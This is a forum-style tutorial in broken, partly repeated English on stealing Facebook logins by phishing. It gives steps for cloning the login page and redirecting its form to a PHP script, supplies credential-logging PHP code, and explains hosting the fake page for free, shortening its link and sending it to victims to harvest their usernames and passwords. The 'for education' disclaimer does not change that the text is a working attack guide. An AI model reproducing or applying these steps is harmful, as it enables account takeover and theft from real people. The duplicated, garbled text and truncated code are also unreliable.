The easiest way of hacking someone FB ID with fb phishing .here i m not discussing that what is PHISHING .but discuss full procedure
While doing phishing we need
Click CTRL+F and search the word "action".many action will appears as u attempt searching bt u will have to select that which is like action"http://facebook.com/login.php..... upto comma(") close, delete the words b/w "......" nd replace with WRITE.php .the above sentence then becomes action"write.php".......
Save this file with name index.html and keep in harddisk
Making WRITE.php: just copy the following code to the notepad and save as write.php
Download files http://goo.gl/hVVOmk
make an account infree web hosting site ilke
Www my3gb.com
In order to send ur login page to the victim,follow steps
The easiest way of hacking someone FB ID with fb phishing .here i m not discussing that what is PHISHING .but discuss full procedure
- Index.html
- Write.php
- Account in free web hosting
Click CTRL+F and search the word "action".many action will appears as u attempt searching bt u will have to select that which is like action"http://facebook.com/login.php..... upto comma(") close, delete the words b/w "......" nd replace with WRITE.php .the above sentence then becomes action"write.php".......
Save this file with name index.html and keep in harddisk
Making WRITE.php: just copy the following code to the notepad and save as write.php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");
Www my3gb.com
- I"ll recommend u to use the last one ,which is easy and also on Mobile accessible .HOW to use follow steps
- Goto the site i gave u already,and sign up
- Confirm ur account with email,and alk ur login information will be send to ur email like username and password
- Now goto to the home of the site and click login
- Enter ur login informations
- Goto online file manager in files section
- Where u will see a folder name hot_doc,get enter to this folder,there will be a file, delete the file
- Now upload ur phishing two files
SENDING TO THE VICTIMS:Your fake page is ready,now u have to send the page to the victim
In order to send ur login page to the victim,follow steps
- Note ur account url it will be like YOURUSERNAME.CPANAL.BYETHOST8.COM
- Now short ur url with goo.gl ,u will recieve your modified form of url like http://goo.gl/XXX
- Now send this link to ur victim when the vitim visits this link it will b goes to ur fake page,and when he or she log in using his/her username and password.,a text file with vitim login informations in it will automatically send to the place where u have uploaded ur phishing files
Now goto ur webhost account back ,u will see a 3rd text file open it u will see victim login informations.ENJOY
NOTE:phishing is illegal ,im not responsible for any mistake you made.i m only sharing for education
Any help: 03449286874